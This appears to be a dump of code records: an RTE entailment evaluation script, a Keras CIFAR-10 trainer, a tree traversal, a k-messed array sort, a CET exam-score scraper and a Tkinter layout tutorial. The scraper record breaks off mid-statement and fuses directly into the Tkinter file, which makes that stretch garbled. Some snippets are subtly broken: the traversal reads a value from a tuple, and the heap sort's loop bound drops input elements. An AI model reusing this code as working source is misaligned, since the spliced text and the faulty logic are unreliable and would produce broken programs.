read_rte_from_nltk(model, version=version)\n vectorized_train_ts = X_train[:, :4800]\n vectorized_train_hs = X_train[:, 4800:]\n X_train = np.abs(vectorized_train_ts - vectorized_train_hs)\n X_train = np.concatenate([X_train, vectorized_train_ts * vectorized_train_hs], axis=1)\n if cosine_feature:\n X_train = np.concatenate([X_train, train_cosine], axis=1)\n # train_cosine_similarity = np.concatenate(\n # map(pairwise.cosine_similarity, vectorized_train_ts, vectorized_train_hs)\n # )\n # X_train = np.concatenate([X_train, train_cosine_similarity], axis=1)\n vectorized_test_ts = X_test[:, :4800]\n vectorized_test_hs = X_test[:, 4800:]\n X_test = np.abs(vectorized_test_ts - vectorized_test_hs)\n X_test = np.concatenate([X_test, vectorized_test_ts * vectorized_test_hs], axis=1)\n if cosine_feature:\n X_test = np.concatenate([X_test, test_cosine], axis=1)\n # test_cosine_similarity = np.concatenate(\n # map(pairwise.cosine_similarity, vectorized_test_ts, vectorized_test_hs)\n # )\n # X_test = np.concatenate([X_test, test_cosine_similarity], axis=1)\n\n X_train_all.append(X_train)\n X_test_all.append(X_test)\n train_labels_all.append(train_labels)\n test_labels_all.append(test_labels)\n logger.info('X_train.shape: {0}'.format(X_train.shape))\n logger.info('X_test.shape: {0}'.format(X_test.shape))\n # pca = PCA(n_components=n_components)\n # X_train = pca.fit_transform(X_train)\n # X_test = pca.transform(X_test)\n # logger.info('After PCA')\n # logger.info('X_train.shape: {0}'.format(X_train.shape))\n # logger.info('X_test.shape: {0}'.format(X_test.shape))\n logreg = LogisticRegressionCV(Cs=Cs, cv=3, n_jobs=10, random_state=919)\n logreg.fit(X_train, train_labels)\n logger.info('best C is {0}'.format(logreg.C_))\n y_test_predicted = logreg.predict(X_test)\n y_test_proba = logreg.predict_proba(X_test)\n acc = accuracy_score(test_labels, y_test_predicted)\n logger.info('evaluate at RTE {0} dataset'.format(version))\n logger.info('test data predicted accuracy: {0}'.format(acc))\n # logloss = log_loss(test_labels, y_test_proba)\n # logger.info('log loss at test data: {0}'.format(logloss))\n\n # save predicted score as another experience feature\n if not cosine_feature:\n y_train_proba = logreg.predict_proba(X_train)\n y_train_proba = y_train_proba[:, :1]\n y_test_proba = y_test_proba[:, :1]\n logger.info('save score ...')\n joblib.dump((y_train_proba, y_test_proba), './rte_data/logistic_score_rte{0}.pkl'.format(version))\n\n X_train_all = np.concatenate(X_train_all)\n X_test_all = np.concatenate(X_test_all)\n train_labels_all = np.concatenate(train_labels_all)\n test_labels_all = np.concatenate(test_labels_all)\n logger.info('X_train_all.shape: {0}'.format(X_train_all.shape))\n logger.info('X_test_all.shape: {0}'.format(X_test_all.shape))\n # pca = PCA(n_components=n_components)\n # X_train_all = pca.fit_transform(X_train_all)\n # X_test_all = pca.transform(X_test_all)\n # logger.info('After PCA')\n # logger.info('X_train_all.shape: {0}'.format(X_train_all.shape))\n # logger.info('X_test_all.shape: {0}'.format(X_test_all.shape))\n logreg = LogisticRegressionCV(Cs=Cs, cv=3, n_jobs=10, random_state=919)\n logreg.fit(X_train_all, train_labels_all)\n logger.info('best C is {0}'.format(logreg.C_))\n y_test_all_predicted = logreg.predict(X_test_all)\n y_test_all_proba = logreg.predict_proba(X_test_all)\n acc = accuracy_score(test_labels_all, y_test_all_predicted)\n logger.info('evaluate at RTE combined dataset')\n logger.info('test data predicted accuracy: {0}'.format(acc))\n # logloss = 
log_loss(test_labels_all, y_test_all_proba)\n # logger.info('log loss at test data: {0}'.format(logloss))\n\n # save predicted score as another experience feature\n if not cosine_feature:\n y_train_all_proba = logreg.predict_proba(X_train_all)\n logger.info('save score ...')\n y_train_all_proba = y_train_all_proba[:, :1]\n y_test_all_proba = y_test_all_proba[:, :1]\n joblib.dump((y_train_all_proba, y_test_all_proba), './rte_data/logistic_score_rte_all.pkl')\n\n\ndef random_forest_test():\n logger.info('read model ...')\n n_components = 256\n model = read_model()\n X_train_all = []\n X_test_all = []\n train_labels_all = []\n test_labels_all = []\n for version in range(1, 4):\n logger.info('loading version {0} data ...'.format(version))\n X_train, X_test, train_labels, test_labels = read_rte_from_nltk(model, version=version)\n X_train_all.append(X_train)\n X_test_all.append(X_test)\n train_labels_all.append(train_labels)\n test_labels_all.append(test_labels)\n logger.info('X_train.shape: {0}'.format(X_train.shape))\n logger.info('X_test.shape: {0}'.format(X_test.shape))\n pca = PCA(n_components=n_components)\n X_train = pca.fit_transform(X_train)\n X_test = pca.transform(X_test)\n logger.info('After PCA')\n logger.info('X_train.shape: {0}'.format(X_train.shape))\n logger.info('X_test.shape: {0}'.format(X_test.shape))\n rfc = RandomForestClassifier(n_jobs=10, random_state=919)\n rfc.fit(X_train, train_labels)\n y_test_predicted = rfc.predict(X_test)\n y_test_proba = rfc.predict_proba(X_test)\n acc = accuracy_score(test_labels, y_test_predicted)\n logger.info('evaluate at RTE {0} dataset'.format(version))\n logger.info('test data predicted accuracy: {0}'.format(acc))\n logloss = log_loss(test_labels, y_test_proba)\n logger.info('log loss at test data: {0}'.format(logloss))\n\n X_train_all = np.concatenate(X_train_all)\n X_test_all = np.concatenate(X_test_all)\n train_labels_all = np.concatenate(train_labels_all)\n test_labels_all = np.concatenate(test_labels_all)\n logger.info('X_train_all.shape: {0}'.format(X_train_all.shape))\n logger.info('X_test_all.shape: {0}'.format(X_test_all.shape))\n pca = PCA(n_components=n_components)\n X_train_all = pca.fit_transform(X_train_all)\n X_test_all = pca.transform(X_test_all)\n logger.info('After PCA')\n logger.info('X_train_all.shape: {0}'.format(X_train_all.shape))\n logger.info('X_test_all.shape: {0}'.format(X_test_all.shape))\n rfc = RandomForestClassifier(n_jobs=10, random_state=919)\n rfc.fit(X_train_all, train_labels_all)\n y_test_all_predicted = rfc.predict(X_test_all)\n y_test_all_proba = rfc.predict_proba(X_test_all)\n acc = accuracy_score(test_labels_all, y_test_all_predicted)\n logger.info('evaluate at RTE combined dataset')\n logger.info('test data predicted accuracy: {0}'.format(acc))\n logloss = log_loss(test_labels_all, y_test_all_proba)\n logger.info('log loss at test data: {0}'.format(logloss))\n\nif __name__ == '__main__':\n logistic_test(cosine_feature=True)\n # logistic_test_using_cosine(score_feature=False)","sub_path":"eval_rte_dataset.py","file_name":"eval_rte_dataset.py","file_ext":"py","file_size_in_byte":18791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
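Note on the record above: logistic_test() represents each sentence pair of 4800-dimensional skip-thought vectors by concatenating the componentwise absolute difference |u - v| with the componentwise product u * v before fitting the classifier. A self-contained sketch of that feature map; the dimensions are illustrative:

import numpy as np

def pair_features(u, v):
    """Concatenate componentwise |u - v| and u * v along the last axis."""
    u, v = np.asarray(u), np.asarray(v)
    return np.concatenate([np.abs(u - v), u * v], axis=-1)

u, v = np.random.rand(4800), np.random.rand(4800)
assert pair_features(u, v).shape == (9600,)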
+{"seq_id":"100453998","text":"from __future__ import print_function\nimport keras\nimport matplotlib.pyplot as plt\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D,AveragePooling2D\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils import np_utils\nfrom keras.callbacks import History\nimport numpy as np\nimport os\nimport sys\nimport pickle\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\n\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 1.0\nset_session(tf.Session(config=config))\n'''\ntry et model\n'''\nchannels = 3\ndef unpickle(file):\n\timport pickle\n\twith open(file, 'rb') as fo:\n\t\tdict = pickle.load(fo, encoding='bytes')\n\treturn dict\ndef unpickle(file): \n with open(file, 'rb') as fo:\n dict = pickle.load(fo,encoding='bytes')\n return dict\n\ndef convert_images(raw_images):\n raw = np.array(raw_images, dtype = float)/255.0\n images = raw.reshape([-1, channels, size, size])\n images = images.transpose([0, 2, 3, 1])\n return images\nsize =32\ndef load_data(file):\n data = unpickle(file)\n images_array = data[b'data']\n images = convert_images(images_array)\n labels = np.array(data[b'labels'])\n return images, labels\n\ndef get_test_data():\n images, labels = load_data(\"test_batch\")\n return images, labels, np_utils.to_categorical(labels, 10)\n\ndef get_train_data():\n images = np.zeros(shape = [50000, size, size, channels], dtype = float)\n labels = np.zeros(shape = [50000], dtype = int)\n start = 0\n\n for i in range(5):\n images_batch, labels_batch = load_data(\"data_batch_\" + str(i+1))\n end = start + 10000\n images[start:end,:] = images_batch \n labels[start:end] = labels_batch\n start = end\n\n return images, labels, np_utils.to_categorical(labels,10)\ndef norm(nonx):\n\tnonx=nonx/255\n\n\tmean=np.mean(nonx)\n\tstd=np.std(nonx)\n\tfex=(nonx-mean)/std\n\treturn fex\n\nif __name__=='__main__':\n\t\n\ttrainx,labelx,trainy=get_train_data()\n\ttestx,labely,testy=get_test_data()\n\n\n\n\n\t'''\n\tmodel = Sequential()\n\tmodel.add(Conv2D(64,(5,5),input_shape=(32,32,3),activation='relu'));\n\tmodel.add(MaxPooling2D((2,2),strides=2))\n\t\n\tmodel.add(Flatten())\n\tmodel.add(Dense(units=10,activation='softmax'))\n\t\n\tmodel.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\n\tmodel.fit(trainx,trainy,validation_split=0,shuffle=True,batch_size=100,epochs=50)\n\tmodel.evaluate(testx,testy);\n\t'''\n\n\t'''\n\ttry model\n\t'''\n\t\n\n\tmodel = Sequential()\n\n\t#model.add(Conv2D(32, (3,3), padding='same', input_shape= x_train.shape[1:]))\n\tmodel.add(Conv2D(32, kernel_size=(3, 3), padding='same',input_shape=(32,32,3)))\n\tmodel.add(Activation('relu')) \n\tmodel.add(Conv2D(32, (3, 3))) \n\tmodel.add(Activation('relu')) \n\tmodel.add(Dropout(0.25)) \n\t \n\tmodel.add(Conv2D(64, (3, 3), padding='same')) \n\tmodel.add(Activation('relu')) \n\tmodel.add(Conv2D(64, (3, 3))) \n\tmodel.add(Activation('relu')) \n\tmodel.add(AveragePooling2D(pool_size=(2, 2))) \n\tmodel.add(Dropout(0.25)) \n\t \n\tmodel.add(Conv2D(128, (3, 3), padding='same')) \n\tmodel.add(Activation('relu')) \n\tmodel.add(Conv2D(128, (3, 3))) \n\tmodel.add(Activation('relu')) \n\tmodel.add(AveragePooling2D(pool_size=(2, 2))) \n\tmodel.add(Dropout(0.25)) \n\t \n\tmodel.add(Conv2D(256, (3, 3), padding='same')) \n\tmodel.add(Activation('relu')) \n\tmodel.add(Conv2D(256, (1, 
1))) \n\tmodel.add(Activation('relu')) \n\tmodel.add(AveragePooling2D(pool_size=(2, 2))) \n\tmodel.add(Dropout(0.25)) \n\t \n\tmodel.add(Flatten()) \n\tmodel.add(Dense(512)) \n\tmodel.add(Activation('relu')) \n\tmodel.add(Dropout(0.5)) \n\tmodel.add(Dense(10)) \n\tmodel.add(Activation('softmax')) \n\t\n\n\tdatagen = ImageDataGenerator(\n\t\tfeaturewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=15, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=False) # randomly flip images\n\n\tepochs = 400\n\tlrate = 0.01\n\tdecay = lrate/epochs\n\topt = keras.optimizers.Adam(decay=0.000001)\n\t#opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)\n\n\t# Let's train the model using RMSprop\n\tmodel.compile(loss='categorical_crossentropy',\n\t optimizer=opt,\n\t metrics=['accuracy'])\n\tprint(model.summary())\n\tdatagen.fit(trainx)\n\this=model.fit_generator(datagen.flow(trainx, trainy,\n batch_size=32),\n epochs=epochs,\n validation_data=(testx, testy),\n steps_per_epoch=50000//32)\n\t\n\t'''\n\tmodel.fit(trainx, trainy,\n batch_size=32,\n epochs=epochs,\n validation_data=(testx, testy),\n shuffle=True)\n\t'''\n\n\t\n\t# Final evaluation of the model\n\tscores = model.evaluate(testx, testy, verbose=1)\n\tmodel.save('model.h5')\n\tprint('Test loss:', scores[0])\n\tprint('Test accuracy:', scores[1])\n\tplt.plot(his.history['acc'])\n\tplt.plot(his.history['val_acc'])\n\tplt.savefig('one.png')\n\t\n\t#print(dat.a)\n","sub_path":"hw3/cifar-10-batches-py/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
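Note on the record above: the norm() helper (defined but never called in __main__) standardizes the whole batch with a single global mean and std, and unpickle is defined twice, with the second definition shadowing the first. The per-channel variant below is a sketch of what is commonly used for CIFAR-10, offered as an assumption rather than what the script does:

import numpy as np

def norm_per_channel(images):
    """Scale to [0, 1], then standardize each RGB channel separately."""
    x = images.astype('float32') / 255.0
    mean = x.mean(axis=(0, 1, 2), keepdims=True)  # shape (1, 1, 1, 3)
    std = x.std(axis=(0, 1, 2), keepdims=True)
    return (x - mean) / std

batch = np.random.randint(0, 256, size=(8, 32, 32, 3))
assert norm_per_channel(batch).shape == (8, 32, 32, 3)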
+{"seq_id":"428839186","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def preorderTraversal(self, root):\n ret = []\n stack = [(root, False)]\n temp = stack[-1]\n print(temp)\n while stack:\n node = stack.pop()\n if node:\n ret.append(node.val)\n stack.append(node.right)\n stack.append(node.left)\n return ret\n\nr1 = TreeNode(4)\nr2 = TreeNode(2)\n# r3 = TreeNode(6)\n# r4 = TreeNode(1)\n# r5 =TreeNode(3)\n# r6 = TreeNode(5)\n# r7 = TreeNode(7)\n\n\nr1.left = r2\n# r1.right = r3\n# r2.left = r4\n# r2.right = r5\n# r3.left = r6\n# r3.right = r7\n\na = Solution().preorderTraversal(r1)\nprint(a)","sub_path":"test_stack.py","file_name":"test_stack.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"338037680","text":"import heapq as hq\n\n\n# hq.heappush(heap, value)\n# value = hq.pop(heap)\n# empty = not heap\ndef sort_k_messed_array(arr, k):\n if not arr:\n return arr\n\n heap = []\n result = []\n for i in range(k + 1):\n hq.heappush(heap, arr[i])\n\n for j in range(k + 1, len(arr) - k, 1):\n result.append(hq.heappop(heap))\n hq.heappush(heap, arr[j])\n\n while heap:\n result.append(hq.heappop(heap))\n\n return result","sub_path":"random/K_Messed_Array_Sort.py","file_name":"K_Messed_Array_Sort.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"390121779","text":"#四六级查询 <中国教育考试网>\nimport requests\nimport re\nfrom PIL import Image\nimport random\nimport demjson\nimport time\nheaders_referer={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','Referer':'http://cet.neea.edu.cn/cet/'}\nheaders={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'}\nurl='http://cache.neea.edu.cn/cet/query'\nid_=input('Plese input your ID number:')\nname=input('Please input your name:')\ndata_=''\n# id_='140021181214726'#付盼\n# id_='140021181111108'#刘鹏\nv_url='http://cache.neea.edu.cn/Imgs.do?c=CET&ik=%s&t='%(id_)+str(random.random())\nr_session=requests.Session()\n\nv_r=r_session.get(v_url,headers = headers_referer)\nimg_url=re.findall('http://cet.neea.edu.cn/imgs/\\S+.png',v_r.text)[0]\nimg_r=requests.get(img_url,headers=headers)\nwith open('1.png','wb') as pho:\n pho.write(img_r.content)\nimg = Image.open('1.png')\nimg.show()\nvarify=input('varify:')\ndata={'data':'','v':''}\ntime=time.localtime()\nyear=str(time.tm_year)[-2:]\nmon=time.tm_mon\nif 7 side\n# TOP : 預設,由上至下排列\n# BOTTOM : 由下至上排列\n# LEFT : 由左至右排列\n# RIGHT : 由右至左排列\n\n# pack基本用法\ndef pack_to_side():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"pack_to_side\")\n\n # 標籤1\n lab1 = Label(root, text=\"lab1\", bg=\"lightyellow\")\n # 標籤2\n lab2 = Label(root, text=\"lab2\", bg=\"lightgreen\")\n # 標籤3\n lab3 = Label(root, text=\"lab3\", bg=\"lightblue\")\n\n # 包裝元件\n lab1.pack(side=TOP)\n # 包裝元件\n lab2.pack(side=RIGHT)\n # 包裝元件\n lab3.pack(side=LEFT)\n\n # 執行,放在最後一行\n root.mainloop()\n\n\n# (第1種方式)pack -> anchor\ndef pack_to_anchor_one():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"pack_to_anchor_one\")\n # 視窗大小\n root.geometry(\"300x180\")\n\n # 標籤\n OKlabel = Label(root, text=\"OK\", bg=\"lightblue\")\n\n # 包裝和定位元件\n OKlabel.pack(anchor=\"se\", side=RIGHT)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# (第2種方式)pack -> anchor\ndef pack_to_anchor_two():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"pack_to_anchor_two\")\n # 視窗大小\n root.geometry(\"300x180\")\n\n # OK標籤\n OKlabel = Label(root, text=\"OK\", bg=\"lightblue\")\n # NO標籤\n NOlabel = Label(root, text=\"NO\", bg=\"lightblue\")\n\n # 包裝和定位元件(從右開始在南方配置)\n OKlabel.pack(anchor=\"s\", side=RIGHT, padx=5)\n # 包裝和定位元件(從右開始在東南方配置)\n NOlabel.pack(anchor=\"se\", side=RIGHT, padx=5)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# pack -> fill\ndef pack_to_fill():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"pack_to_fill\")\n # 視窗大小\n root.geometry(\"300x180\")\n\n # 標籤1\n lab1 = Label(root, text=\"lab1\", bg=\"lightblue\")\n # 標籤2\n lab2 = Label(root, text=\"lab2\", bg=\"lightblue\")\n\n # 包裝和定位元件\n lab1.pack(fill=X)\n # 包裝和定位元件\n lab2.pack(fill=Y, side=RIGHT)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# pack -> expand\ndef pack_to_expand():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"pack_to_expand\")\n # 視窗大小\n root.geometry(\"300x180\")\n\n # 標籤1\n lab1 = Label(root, text=\"lab1\", bg=\"lightblue\")\n # 標籤2\n lab2 = Label(root, text=\"lab2\", bg=\"lightblue\")\n # 標籤3\n lab3 = Label(root, text=\"lab3\", bg=\"lightgreen\")\n\n # 包裝和定位元件\n lab1.pack(fill=X)\n # 包裝和定位元件\n lab2.pack(fill=Y, side=RIGHT)\n # 包裝和定位元件(填滿X、Y軸)\n lab3.pack(fill=BOTH, expand=True)\n\n # 執行,放在最後一行\n root.mainloop()\n\n\n##==============================================================================================\n## 
Function(grid)\n##==============================================================================================\n\n##==============================================================================================\n## |row=0,column=0| |row=0,column=1| **** |row=0,column=n|\n## |row=1,column=0| |row=1,column=1| **** |row=1,column=n|\n## ******\n## |row=n,column=0| |row=n,column=1| **** |row=n,column=n|\n##==============================================================================================\n\n# grid 基本用法\ndef grid_to_base():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_base\")\n\n # 標籤顏色=淺黃色,標籤寬度=15\n lab1 = Label(root , text=\"逢甲大學\" , bg=\"lightyellow\" , width=15)\n # 標籤顏色=淺綠色,標籤寬度=15\n lab2 = Label(root, text=\"東海大學\", bg=\"lightgreen\", width=15)\n #標籤顏色=淺藍色,標籤寬度=15\n lab3 = Label(root, text=\"中興大學\", bg=\"lightblue\", width=15)\n\n # 分配位置\n lab1.grid(row=0, column=0)\n lab2.grid(row=1, column=1)\n lab3.grid(row=2, column=2)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# grid -> columnspan(未使用)\ndef grid_to_columnspan_not():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_columnspan_not\")\n\n #標籤寬度=15,加上邊框\n lab1 = Label(root , text=\"lab1\" , width=15 , relief=\"raised\")\n #標籤寬度=15,加上邊框\n lab2 = Label(root , text=\"lab2\" , width=15 , relief=\"raised\")\n #標籤寬度=15,加上邊框\n lab3 = Label(root , text=\"lab3\" , width=15 , relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab4 = Label(root, text=\"lab4\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab5 = Label(root, text=\"lab5\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab6 = Label(root, text=\"lab6\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab7 = Label(root, text=\"lab7\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab8 = Label(root, text=\"lab8\", width=15, relief=\"raised\")\n\n # 分配位置\n lab1.grid(row=0, column=0)\n lab2.grid(row=0, column=1)\n lab3.grid(row=0, column=2)\n lab4.grid(row=0, column=3)\n\n lab5.grid(row=1, column=0)\n lab6.grid(row=1, column=1)\n lab7.grid(row=1, column=2)\n lab8.grid(row=1, column=3)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# grid -> columnspan(使用)\ndef grid_to_columnspan():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_columnspan\")\n\n #標籤寬度=15,加上邊框\n lab1 = Label(root , text=\"lab1\" , width=15 , relief=\"raised\")\n #標籤寬度=15,加上邊框\n lab2 = Label(root , text=\"lab2\" , width=15 , relief=\"raised\")\n\n # 標籤3的空間被標籤2占用\n\n # 標籤寬度=15,加上邊框\n lab4 = Label(root, text=\"lab4\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab5 = Label(root, text=\"lab5\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab6 = Label(root, text=\"lab6\", width=15, relief=\"raised\")\n # 標���寬度=15,加上邊框\n lab7 = Label(root, text=\"lab7\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab8 = Label(root, text=\"lab8\", width=15, relief=\"raised\")\n\n # 分配位置\n lab1.grid(row=0, column=0)\n # 標籤2占用2個標籤位置\n lab2.grid(row=0, column=1,columnspan=2)\n\n lab4.grid(row=0, column=3)\n\n lab5.grid(row=1, column=0)\n lab6.grid(row=1, column=1)\n lab7.grid(row=1, column=2)\n lab8.grid(row=1, column=3)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# grid -> rowspan(使用)\ndef grid_to_rowspan():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_rowspan\")\n\n #標籤寬度=15,加上邊框\n lab1 = Label(root , text=\"lab1\" , width=15 , relief=\"raised\")\n #標籤寬度=15,加上邊框\n lab2 = Label(root , text=\"lab2\" , width=15 , relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab3 = Label(root, text=\"lab3\", width=15, relief=\"raised\")\n\n # 標籤寬度=15,加上邊框\n lab4 = Label(root, text=\"lab4\", width=15, 
relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab5 = Label(root, text=\"lab5\", width=15, relief=\"raised\")\n\n # 標籤6的空間被標籤2占用\n\n # 標籤寬度=15,加上邊框\n lab7 = Label(root, text=\"lab7\", width=15, relief=\"raised\")\n # 標籤寬度=15,加上邊框\n lab8 = Label(root, text=\"lab8\", width=15, relief=\"raised\")\n\n # 分配位置\n lab1.grid(row=0, column=0)\n # 標籤2占用2個標籤位置\n lab2.grid(row=0, column=1,rowspan=2)\n lab3.grid(row=0, column=2)\n lab4.grid(row=0, column=3)\n\n lab5.grid(row=1, column=0)\n\n lab7.grid(row=1, column=2)\n lab8.grid(row=1, column=3)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# grid -> colortable\ndef grid_to_colortable():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_colortable\")\n # 色碼\n colors = [\"red\",\"orange\",\"yellow\"]\n\n # row\n r = 0\n\n for color in colors:\n Label(root,text=color,relief=\"groove\",width=20).grid(row=r,column=0)\n Label(root,bg=color,relief=\"ridge\",width=20).grid(row=r,column=1)\n r = r + 1\n\n\n # 執行,放在最後一行\n root.mainloop()\n\n# grid -> configure\n# 讓元件隨視窗大小改變\n# rowconfigure(n,weight=x) : 第n列row,隨視窗改變比例為x\n# columnconfigure(n,weight=x) : 第n行column,隨視窗改變比例為x\ndef grid_to_configure():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"grid_to_configure\")\n\n # 第1列row,隨視窗改變比例為1\n root.rowconfigure(1,weight=1)\n # 第0行column,隨視窗改變比例為1\n root.columnconfigure(0,weight=1)\n\n lab1 = Label(root,text=\"lab1\",bg=\"pink\")\n # sticky=左右對齊\n lab1.grid(row=0,column=0,padx=5,pady=5,sticky=W+E)\n\n lab2 = Label(root, text=\"lab2\", bg=\"lightblue\")\n lab2.grid(row=0, column=1, padx=5, pady=5)\n\n lab3 = Label(root, text=\"lab3\", bg=\"yellow\")\n # sticky=頂端、底部、左右對齊\n lab3.grid(row=1, column=0,columnspan=2, padx=5, pady=5, sticky=N+S+W+E)\n\n # 執行,放在最後一行\n root.mainloop()\n\n\n\n##==============================================================================================\n## Function(place)\n##==============================================================================================\n\n##==============================================================================================\n## 以像素來控制元件\n##==============================================================================================\n\n# place基本用法\ndef place_to_base():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"place_to_base\")\n\n # 標籤顏色=淺黃色,標籤寬度=15\n lab1 = Label(root, text=\"逢甲大學\", bg=\"lightyellow\", width=15)\n # 標籤顏色=淺綠色,標籤寬度=15\n lab2 = Label(root, text=\"東海大學\", bg=\"lightgreen\", width=15)\n # 標籤顏色=淺藍色,標籤寬度=15\n lab3 = Label(root, text=\"中興大學\", bg=\"lightblue\", width=15)\n\n # 分配位置\n lab1.place(x=0, y=0)\n lab2.place(x=30, y=50)\n lab3.place(x=60, y=100)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# place -> 控制圖片位置、大小(絕對)\ndef place_to_imagesize():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"place_to_imagesize\")\n # 視窗大小\n root.geometry(\"640x480\")\n\n # box圖片\n image_box = PhotoImage(file=\"../imgfolder/box.jpg\")\n lab_box = Label(root,image=image_box)\n # x=距離左上角的水平距離、y=距離左上角的垂直距離、width=圖片最大顯示的寬、height=圖片最大顯示的高\n lab_box.place(x=20,y=20,width=320,height=240)\n\n # link圖��\n image_link = PhotoImage(file=\"../imgfolder/link.png\")\n lab_link = Label(root, image=image_link)\n lab_link.place(x=300, y=200, width=320, height=240)\n\n # 執行,放在最後一行\n root.mainloop()\n\n# place -> 控制圖片位置、大小(相對)\ndef place_to_imagesize_rel():\n # 建立視窗,root可取其它名稱\n root = Tk()\n # 視窗標題\n root.title(\"place_to_imagesize\")\n # 視窗大小\n root.geometry(\"640x480\")\n\n # box圖片\n image_box = PhotoImage(file=\"../imgfolder/box.jpg\")\n lab_box = Label(root, image=image_box)\n # 
relx=圖片相對視窗的水平距離、rely=圖片相對視窗的垂直距離、relwidth=圖片相對視窗的最大顯示的寬、relheight=圖片相對視窗的最大顯示的高\n lab_box.place(relx=0.1, rely=0.1, relwidth=0.8, relheight=0.8)\n\n # 執行,放在最後一行\n root.mainloop()\n##==============================================================================================\n## Main\n##==============================================================================================\n\n##==============================================================================================\n### pack\n\n# pack -> side\n#pack_to_side()\n\n# (第1種方式)pack -> anchor\n#pack_to_anchor_one()\n\n# (第2種方式)pack -> anchor\n#pack_to_anchor_two()\n\n# pack -> fill\n#pack_to_fill()\n\n# pack -> expand\n#pack_to_expand()\n\n##==============================================================================================\n### grid\n\n# grid 基本用法\n#grid_to_base()\n\n# grid -> columnspan(未使用)\n#grid_to_columnspan_not()\n\n# grid -> columnspan(使用)\n#grid_to_columnspan()\n\n# grid -> rowspan\n#grid_to_rowspan()\n\n# grid -> colortable\n#grid_to_colortable()\n\n# grid -> configure\n#grid_to_configure()\n\n##==============================================================================================\n### place\n\n# place基本用法\n#place_to_base()\n\n# place -> 控制圖片位置、大小(絕對)\n#place_to_imagesize()\n\n# place -> 控制圖片位置、大小(相對)\n#place_to_imagesize_rel()\n\n\n\n\n\n\n\n\n","sub_path":"Python_Tkinter/Python_Tkinter_Widget_Layout.py","file_name":"Python_Tkinter_Widget_Layout.py","file_ext":"py","file_size_in_byte":13487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
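Note on the record above: the key resizing idea in grid_to_configure is that rows and columns only stretch when they carry a nonzero weight, and the widget must be made sticky on all four sides. A minimal self-contained sketch of just that mechanism (the label text and color are illustrative):

from tkinter import Tk, Label, N, S, E, W

root = Tk()
root.rowconfigure(0, weight=1)     # row 0 absorbs all extra height
root.columnconfigure(0, weight=1)  # column 0 absorbs all extra width
Label(root, text="stretch me", bg="lightblue").grid(
    row=0, column=0, sticky=N + S + E + W)
root.mainloop()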
